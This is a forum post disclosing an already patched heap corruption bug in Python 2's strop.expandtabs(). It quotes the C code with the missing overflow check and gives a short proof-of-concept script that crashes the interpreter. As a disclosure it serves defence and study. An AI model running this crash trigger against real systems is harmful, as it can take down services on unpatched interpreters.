Announcement Announcement Module
Collapse
No announcement yet.
Python Interpreter Heap Memory Corruption Page Title Module
Move Remove Collapse
X
Conversation Detail Module
Collapse
  • Filter
  • Time
  • Show
Clear All
new posts

  • Python Interpreter Heap Memory Corruption

    Recentl a new fix has been pushed to official python source code repository which fixes (http://hg.python.org/cpython/rev/5dabc2d2f776
    ) a memory corruption vulnerability in python interpreter's strop module. The vulnerability lies in expandtabs() functions.
    This is due to a missing check in line 626,627 of /Modules/stropmodule.c.

    Vulnerable Code:

    Code:
      ##https://github.com/pgbovine/Py2crazy/blob/master/Python-2.7.5/Modules/stropmodule.c#L627
    
       for (p = string; p < e; p++) {
              if (*p == '\t') {
                  j += tabsize - (j%tabsize);
                  if (old_j > j) {
                      PyErr_SetString(PyExc_OverflowError,
                                      "new string is too long");
                      return NULL;
                  }
                  old_j = j;
              } else {
                  j++;
                  if (*p == '\n') {
              // Missing check
                      i += j; 
                      j = 0;
                  }
              }
          }
    Patch Diff:
    http://hg.python.org/cpython/diff/5d.../stropmodule.c


    =================
    Proof of Concept:
    =================

    Running below code will crash the vulnerable python process.

    Code:
      import strop
      raw_input('Press Enter to BOOM!')
      a = '\t\n' * 65536
      strop.expandtabs(a, 65536)
Working...
X